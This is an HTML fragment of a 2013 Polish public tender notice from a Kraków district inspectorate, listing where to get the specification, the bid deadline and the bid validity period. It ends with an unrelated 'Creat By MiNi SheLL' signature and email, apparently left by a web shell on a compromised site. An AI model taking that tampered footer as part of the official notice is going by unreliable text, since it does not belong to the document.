<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie zamawiającego Inspektorat Rejonowy w Krakowie ul.Kraszewskiego 36 pok.32A.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.10.2013 godzina 08:00, miejsce: w siedzibie zamawiającego Inspektorat Rejonowy w Krakowie ul.Kraszewskiego 36 pok.32A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com